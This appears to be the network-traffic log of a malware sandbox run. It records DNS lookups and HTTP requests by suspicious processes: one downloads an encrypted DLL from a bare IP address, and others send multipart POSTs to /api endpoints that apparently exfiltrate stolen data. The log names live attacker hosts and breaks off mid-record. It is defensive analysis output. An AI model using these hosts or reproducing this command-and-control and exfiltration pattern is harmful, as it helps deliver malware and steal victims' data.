                                                                                              r2.sn-aigl6ns6.gvt1.com
                                                                                              IN AAAA
                                                                                              2a00:1450:4009:4::7
                                                                                            • flag-nl
                                                                                              GET
                                                                                              http://185.156.73.73/success?substr=mixfour&s=three&sub=non
                                                                                              BitLockerToGo.exe
                                                                                              Remote address:
                                                                                              185.156.73.73:80
                                                                                              Request
                                                                                              GET /success?substr=mixfour&s=three&sub=non HTTP/1.1
                                                                                              Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                                                              Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                                                              Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                                                              Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                                                              User-Agent: 1
                                                                                              Host: 185.156.73.73
                                                                                              Connection: Keep-Alive
                                                                                              Cache-Control: no-cache
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Date: Thu, 20 Feb 2025 00:34:42 GMT
                                                                                              Server: Apache/2.4.52 (Ubuntu)
                                                                                              Content-Length: 1
                                                                                              Keep-Alive: timeout=5, max=100
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                            • flag-nl
                                                                                              GET
                                                                                              http://185.156.73.73/info
                                                                                              BitLockerToGo.exe
                                                                                              Remote address:
                                                                                              185.156.73.73:80
                                                                                              Request
                                                                                              GET /info HTTP/1.1
                                                                                              Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                                                              Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                                                              Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                                                              Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                                                              User-Agent: 1
                                                                                              Host: 185.156.73.73
                                                                                              Connection: Keep-Alive
                                                                                              Cache-Control: no-cache
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Date: Thu, 20 Feb 2025 00:34:42 GMT
                                                                                              Server: Apache/2.4.52 (Ubuntu)
                                                                                              Content-Length: 21
                                                                                              Keep-Alive: timeout=5, max=99
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                            • flag-nl
                                                                                              GET
                                                                                              http://185.156.73.73/update
                                                                                              BitLockerToGo.exe
                                                                                              Remote address:
                                                                                              185.156.73.73:80
                                                                                              Request
                                                                                              GET /update HTTP/1.1
                                                                                              Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                                                              Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                                                              Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                                                              Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                                                              User-Agent: 1
                                                                                              Host: 185.156.73.73
                                                                                              Connection: Keep-Alive
                                                                                              Cache-Control: no-cache
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Date: Thu, 20 Feb 2025 00:34:42 GMT
                                                                                              Server: Apache/2.4.52 (Ubuntu)
                                                                                              Content-Disposition: attachment; filename="fuckingdllENCR.dll";
                                                                                              Content-Length: 99856
                                                                                              Keep-Alive: timeout=5, max=98
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: application/octet-stream
                                                                                            • flag-nl
                                                                                              GET
                                                                                              http://185.156.73.73/service
                                                                                              BitLockerToGo.exe
                                                                                              Remote address:
                                                                                              185.156.73.73:80
                                                                                              Request
                                                                                              GET /service HTTP/1.1
                                                                                              Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                                                              Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                                                              Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                                                              Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                                                              User-Agent: C
                                                                                              Host: 185.156.73.73
                                                                                              Connection: Keep-Alive
                                                                                              Cache-Control: no-cache
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Date: Thu, 20 Feb 2025 00:34:42 GMT
                                                                                              Server: Apache/2.4.52 (Ubuntu)
                                                                                              Content-Length: 1
                                                                                              Keep-Alive: timeout=5, max=97
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                            • flag-nl
                                                                                              GET
                                                                                              http://185.156.73.73/service
                                                                                              BitLockerToGo.exe
                                                                                              Remote address:
                                                                                              185.156.73.73:80
                                                                                              Request
                                                                                              GET /service HTTP/1.1
                                                                                              Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                                                              Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                                                              Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                                                              Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                                                              User-Agent: C
                                                                                              Host: 185.156.73.73
                                                                                              Connection: Keep-Alive
                                                                                              Cache-Control: no-cache
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Date: Thu, 20 Feb 2025 00:34:45 GMT
                                                                                              Server: Apache/2.4.52 (Ubuntu)
                                                                                              Content-Length: 1
                                                                                              Keep-Alive: timeout=5, max=96
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                            • flag-nl
                                                                                              GET
                                                                                              http://185.156.73.73/service
                                                                                              BitLockerToGo.exe
                                                                                              Remote address:
                                                                                              185.156.73.73:80
                                                                                              Request
                                                                                              GET /service HTTP/1.1
                                                                                              Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                                                              Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                                                              Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                                                              Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                                                              User-Agent: C
                                                                                              Host: 185.156.73.73
                                                                                              Connection: Keep-Alive
                                                                                              Cache-Control: no-cache
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Date: Thu, 20 Feb 2025 00:34:47 GMT
                                                                                              Server: Apache/2.4.52 (Ubuntu)
                                                                                              Content-Length: 1
                                                                                              Keep-Alive: timeout=5, max=95
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                            • flag-nl
                                                                                              GET
                                                                                              http://185.156.73.73/service
                                                                                              BitLockerToGo.exe
                                                                                              Remote address:
                                                                                              185.156.73.73:80
                                                                                              Request
                                                                                              GET /service HTTP/1.1
                                                                                              Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                                                              Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                                                              Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                                                              Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                                                              User-Agent: C
                                                                                              Host: 185.156.73.73
                                                                                              Connection: Keep-Alive
                                                                                              Cache-Control: no-cache
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Date: Thu, 20 Feb 2025 00:34:49 GMT
                                                                                              Server: Apache/2.4.52 (Ubuntu)
                                                                                              Content-Length: 1
                                                                                              Keep-Alive: timeout=5, max=94
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                            • flag-nl
                                                                                              GET
                                                                                              http://185.156.73.73/service
                                                                                              BitLockerToGo.exe
                                                                                              Remote address:
                                                                                              185.156.73.73:80
                                                                                              Request
                                                                                              GET /service HTTP/1.1
                                                                                              Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                                                              Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                                                              Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                                                              Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                                                              User-Agent: C
                                                                                              Host: 185.156.73.73
                                                                                              Connection: Keep-Alive
                                                                                              Cache-Control: no-cache
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Date: Thu, 20 Feb 2025 00:34:51 GMT
                                                                                              Server: Apache/2.4.52 (Ubuntu)
                                                                                              Content-Length: 1
                                                                                              Keep-Alive: timeout=5, max=93
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                            • flag-nl
                                                                                              GET
                                                                                              http://185.156.73.73/service
                                                                                              BitLockerToGo.exe
                                                                                              Remote address:
                                                                                              185.156.73.73:80
                                                                                              Request
                                                                                              GET /service HTTP/1.1
                                                                                              Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                                                              Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                                                              Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                                                              Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                                                              User-Agent: C
                                                                                              Host: 185.156.73.73
                                                                                              Connection: Keep-Alive
                                                                                              Cache-Control: no-cache
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Date: Thu, 20 Feb 2025 00:34:53 GMT
                                                                                              Server: Apache/2.4.52 (Ubuntu)
                                                                                              Content-Length: 1
                                                                                              Keep-Alive: timeout=5, max=92
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                            • flag-nl
                                                                                              GET
                                                                                              http://185.156.73.73/service
                                                                                              BitLockerToGo.exe
                                                                                              Remote address:
                                                                                              185.156.73.73:80
                                                                                              Request
                                                                                              GET /service HTTP/1.1
                                                                                              Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                                                              Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                                                              Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                                                              Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                                                              User-Agent: C
                                                                                              Host: 185.156.73.73
                                                                                              Connection: Keep-Alive
                                                                                              Cache-Control: no-cache
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Date: Thu, 20 Feb 2025 00:34:55 GMT
                                                                                              Server: Apache/2.4.52 (Ubuntu)
                                                                                              Content-Length: 1
                                                                                              Keep-Alive: timeout=5, max=91
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                            • flag-nl
                                                                                              GET
                                                                                              http://185.156.73.73/service
                                                                                              BitLockerToGo.exe
                                                                                              Remote address:
                                                                                              185.156.73.73:80
                                                                                              Request
                                                                                              GET /service HTTP/1.1
                                                                                              Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                                                              Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                                                              Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                                                              Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                                                              User-Agent: C
                                                                                              Host: 185.156.73.73
                                                                                              Connection: Keep-Alive
                                                                                              Cache-Control: no-cache
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Date: Thu, 20 Feb 2025 00:34:58 GMT
                                                                                              Server: Apache/2.4.52 (Ubuntu)
                                                                                              Content-Length: 1
                                                                                              Keep-Alive: timeout=5, max=90
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                            • flag-nl
                                                                                              GET
                                                                                              http://185.156.73.73/service
                                                                                              BitLockerToGo.exe
                                                                                              Remote address:
                                                                                              185.156.73.73:80
                                                                                              Request
                                                                                              GET /service HTTP/1.1
                                                                                              Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                                                              Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                                                              Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                                                              Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                                                              User-Agent: C
                                                                                              Host: 185.156.73.73
                                                                                              Connection: Keep-Alive
                                                                                              Cache-Control: no-cache
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Date: Thu, 20 Feb 2025 00:35:00 GMT
                                                                                              Server: Apache/2.4.52 (Ubuntu)
                                                                                              Content-Length: 1
                                                                                              Keep-Alive: timeout=5, max=89
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                            • flag-us
                                                                                              POST
                                                                                              https://stormlegue.com/api
                                                                                              alex12112.exe
                                                                                              Remote address:
                                                                                              104.21.16.1:443
                                                                                              Request
                                                                                              POST /api HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: multipart/form-data; boundary=LRW97M5VYDS7NIJ
                                                                                              Cookie: __cf_mw_byp=epdJQGqktuLW4ik0RS1E_fZwiOrRzKB2P05lSkYVKPk-1740011681-0.0.1.1-/api
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                              Content-Length: 1090
                                                                                              Host: stormlegue.com
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Date: Thu, 20 Feb 2025 00:34:43 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: keep-alive
                                                                                              Vary: Accept-Encoding
                                                                                              Set-Cookie: PHPSESSID=nohpkcbb7hsp7p1u1mdmf0h82c; expires=Fri, 21 Feb 2025 00:34:43 GMT; Max-Age=86400; path=/
                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              cf-cache-status: DYNAMIC
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GqDMsQQfFdbqeKtcnoTZZ%2FpM1Q9asHv5339h80lB%2Bd2dg6HII%2Fy9oL%2BtU0OSK2VIL2uh1cMkasZ7s5EA2Rd8jsEaSJRfmCU65J%2B1fvBNog6v7AoR%2Fw0yH51gkE%2F8%2Fv3sLA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 914a699dfcf994ab-LHR
                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=44763&min_rtt=42746&rtt_var=11746&sent=6&recv=7&lost=0&retrans=0&sent_bytes=3565&recv_bytes=1787&delivery_rate=78762&cwnd=253&unsent_bytes=0&cid=202265e294ad02fd&ts=296&x=0"
                                                                                            • flag-us
                                                                                              DNS
                                                                                              telegram.org
                                                                                              powershell.exe
                                                                                              Remote address:
                                                                                              8.8.8.8:53
                                                                                              Request
                                                                                              telegram.org
                                                                                              IN A
                                                                                              Response
                                                                                              telegram.org
                                                                                              IN A
                                                                                              149.154.167.99
                                                                                            • flag-us
                                                                                              DNS
                                                                                              telegram.org
                                                                                              powershell.exe
                                                                                              Remote address:
                                                                                              8.8.8.8:53
                                                                                              Request
                                                                                              telegram.org
                                                                                              IN A
                                                                                            • flag-us
                                                                                              POST
                                                                                              https://stormlegue.com/api
                                                                                              alex12112.exe
                                                                                              Remote address:
                                                                                              104.21.16.1:443
                                                                                              Request
                                                                                              POST /api HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Cookie: __cf_mw_byp=epdJQGqktuLW4ik0RS1E_fZwiOrRzKB2P05lSkYVKPk-1740011681-0.0.1.1-/api
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                              Content-Length: 80
                                                                                              Host: stormlegue.com
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Date: Thu, 20 Feb 2025 00:34:44 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: keep-alive
                                                                                              Vary: Accept-Encoding
                                                                                              Set-Cookie: PHPSESSID=mfb4s62mnoi8g9v02s6umb40bm; expires=Fri, 21 Feb 2025 00:34:44 GMT; Max-Age=86400; path=/
                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              cf-cache-status: DYNAMIC
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YPf0wsxBQUrBH9P3yUbV81zl8SpgIMeGRgONAcGfxoxVxU7OVu6XZE8GMJZYoSCmLAtYPjcn4PgnAH2nOiTrA40IQ7%2BVY3MId2nify70owJEK393X8MwdZOQE3ozIA7VYg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 914a69a059bc3d94-LHR
                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=44635&min_rtt=43247&rtt_var=11694&sent=6&recv=7&lost=0&retrans=0&sent_bytes=3566&recv_bytes=763&delivery_rate=89059&cwnd=253&unsent_bytes=0&cid=73b9d9ed05ae8727&ts=311&x=0"
                                                                                            • flag-us
                                                                                              DNS
                                                                                              blastikcn.com
                                                                                              fher.exe
                                                                                              Remote address:
                                                                                              8.8.8.8:53
                                                                                              Request
                                                                                              blastikcn.com
                                                                                              IN A
                                                                                              Response
                                                                                              blastikcn.com
                                                                                              IN A
                                                                                              172.67.192.178
                                                                                              blastikcn.com
                                                                                              IN A
                                                                                              104.21.60.59
                                                                                            • flag-us
                                                                                              POST
                                                                                              https://blastikcn.com/api
                                                                                              fher.exe
                                                                                              Remote address:
                                                                                              172.67.192.178:443
                                                                                              Request
                                                                                              POST /api HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                              Content-Length: 8
                                                                                              Host: blastikcn.com
                                                                                              Response
                                                                                              HTTP/1.1 403 Forbidden
                                                                                              Date: Thu, 20 Feb 2025 00:34:46 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: keep-alive
                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HqnqUwlUC0gAbNuDENE1WdAA8r%2FKGYc50aJdICTg%2FQtRgP6AAWd1dWCm0WMLAW%2BkTWBDKsbsDAfOH1hUA6%2BJ2PEkEdMlfv00ldGhCztAscxp2yCjVKT%2FunwZ1aVJLZzI"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 914a69b0696aed0a-LHR
                                                                                            • flag-us
                                                                                              POST
                                                                                              https://blastikcn.com/api
                                                                                              fher.exe
                                                                                              Remote address:
                                                                                              172.67.192.178:443
                                                                                              Request
                                                                                              POST /api HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Cookie: __cf_mw_byp=q7S4zfj1FMNq1dXEPoXBInjKK5S3_.h5oKeaU5GdVg0-1740011686-0.0.1.1-/api
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                              Content-Length: 43
                                                                                              Host: blastikcn.com
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Date: Thu, 20 Feb 2025 00:34:46 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: keep-alive
                                                                                              Vary: Accept-Encoding
                                                                                              Set-Cookie: PHPSESSID=cjhrgrvpg215ubat9o82ej7hil; expires=Fri, 21 Feb 2025 00:34:46 GMT; Max-Age=86400; path=/
                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              cf-cache-status: DYNAMIC
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fPzAp9kXrQIck%2B6v0q257B%2BnLN59JLffysQhkFuHarwDzBzl9WZMO4OCHo1RtNIX%2F3iL4SFFQWdTnxuQaBCar9XPsdvrSJUAHuOP7NUUCkAcYYugXc6QC4cPdxShKf%2FO"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 914a69b0b9dced0a-LHR
                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=42275&min_rtt=41731&rtt_var=7375&sent=15&recv=11&lost=0&retrans=0&sent_bytes=8557&recv_bytes=1050&delivery_rate=256977&cwnd=255&unsent_bytes=0&cid=666df8ea788c6b7a&ts=365&x=0"
                                                                                            • flag-us
                                                                                              POST
                                                                                              https://blastikcn.com/api
                                                                                              fher.exe
                                                                                              Remote address:
                                                                                              172.67.192.178:443
                                                                                              Request
                                                                                              POST /api HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: multipart/form-data; boundary=AECCL0V0N3HJ6UIDMS
                                                                                              Cookie: __cf_mw_byp=q7S4zfj1FMNq1dXEPoXBInjKK5S3_.h5oKeaU5GdVg0-1740011686-0.0.1.1-/api
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                              Content-Length: 1650
                                                                                              Host: blastikcn.com
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Date: Thu, 20 Feb 2025 00:34:46 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: keep-alive
                                                                                              Vary: Accept-Encoding
                                                                                              Set-Cookie: PHPSESSID=6kdpc4crm04cage314a4tifhs5; expires=Fri, 21 Feb 2025 00:34:46 GMT; Max-Age=86400; path=/
                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              cf-cache-status: DYNAMIC
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dFe3sERfkJ6dUe3%2Fh2YN2TKaXdf4%2BB4OZq1gYgckNy%2BU%2BT0re8uAg5eIwAdiFV347J3Z1pjht%2BV1KLOjirSiXafBl6aBzzDGtGNDLhBHgh23dCYUe1fQyxGfB6VKaW5R"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 914a69b28c92ed0a-LHR
                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=42355&min_rtt=41731&rtt_var=5690&sent=19&recv=15&lost=0&retrans=0&sent_bytes=9722&recv_bytes=3125&delivery_rate=256977&cwnd=255&unsent_bytes=0&cid=666df8ea788c6b7a&ts=552&x=0"
                                                                                            • flag-us
                                                                                              POST
                                                                                              https://blastikcn.com/api
                                                                                              fher.exe
                                                                                              Remote address:
                                                                                              172.67.192.178:443
                                                                                              Request
                                                                                              POST /api HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: multipart/form-data; boundary=3U9DWLJE
                                                                                              Cookie: __cf_mw_byp=q7S4zfj1FMNq1dXEPoXBInjKK5S3_.h5oKeaU5GdVg0-1740011686-0.0.1.1-/api
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                              Content-Length: 1040
                                                                                              Host: blastikcn.com
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Date: Thu, 20 Feb 2025 00:34:47 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: keep-alive
                                                                                              Vary: Accept-Encoding
                                                                                              Set-Cookie: PHPSESSID=v7m26rv92jvm2q9sj8hvf6qr0d; expires=Fri, 21 Feb 2025 00:34:47 GMT; Max-Age=86400; path=/
                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              cf-cache-status: DYNAMIC
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xVpolfr1xw0ctYYen7TzIMOsDKwZGgOcLuAR7iDaFbGGoxiE2KNLeIyPsnACdgGjOC6A7%2B90V%2FIE5fVq1kIzMojGdFnvu9t48h7peivq4L3Mx4U6vYmk7CSbKbh17hNK"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 914a69b4bf747e9f-LHR
                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=44033&min_rtt=43306&rtt_var=13092&sent=6&recv=7&lost=0&retrans=0&sent_bytes=3291&recv_bytes=1728&delivery_rate=94005&cwnd=250&unsent_bytes=0&cid=757365b029266841&ts=303&x=0"
                                                                                            • flag-us
                                                                                              POST
                                                                                              https://blastikcn.com/api
                                                                                              fher.exe
                                                                                              Remote address:
                                                                                              172.67.192.178:443
                                                                                              Request
                                                                                              POST /api HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Cookie: __cf_mw_byp=q7S4zfj1FMNq1dXEPoXBInjKK5S3_.h5oKeaU5GdVg0-1740011686-0.0.1.1-/api
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                              Content-Length: 77
                                                                                              Host: blastikcn.com
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Date: Thu, 20 Feb 2025 00:34:47 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: keep-alive
                                                                                              Vary: Accept-Encoding
                                                                                              Set-Cookie: PHPSESSID=o05c55tgsf9jppu1g78qhsnb58; expires=Fri, 21 Feb 2025 00:34:47 GMT; Max-Age=86400; path=/
                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              cf-cache-status: DYNAMIC
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XCPx0JgJeHrmL8gyAVgkE%2Fx1EasXxOgryZo3SIjj6Al1wZTmi1hJV3BwR%2FQrYfGigE2oCTwTfoZjlX5VDQ0eg%2BL5K8rs%2BskbJ9YBHKKLP7P5pD6U1df1ktUeFsypo6AT"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 914a69b7396cef1d-LHR
                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=42269&min_rtt=41450&rtt_var=12385&sent=6&recv=7&lost=0&retrans=0&sent_bytes=3291&recv_bytes=758&delivery_rate=98214&cwnd=253&unsent_bytes=0&cid=87bd10a03d10772d&ts=278&x=0"
                                                                                            • flag-us
                                                                                              DNS
                                                                                              byaronia.com
                                                                                              powershell.exe
                                                                                              Remote address:
                                                                                              8.8.8.8:53
                                                                                              Request
                                                                                              byaronia.com
                                                                                              IN A
                                                                                              Response
                                                                                              byaronia.com
                                                                                              IN A
                                                                                              109.232.216.168
                                                                                            • flag-us
                                                                                              DNS
                                                                                              mail.ru
                                                                                              powershell.exe
                                                                                              Remote address:
                                                                                              8.8.8.8:53
                                                                                              Request
                                                                                              mail.ru
                                                                                              IN MX
                                                                                              Response
                                                                                              mail.ru
                                                                                              IN MX
                                                                                              mxs�
                                                                                            • flag-us
                                                                                              DNS
                                                                                              mxs.mail.ru
                                                                                              powershell.exe
                                                                                              Remote address:
                                                                                              8.8.8.8:53
                                                                                              Request
                                                                                              mxs.mail.ru
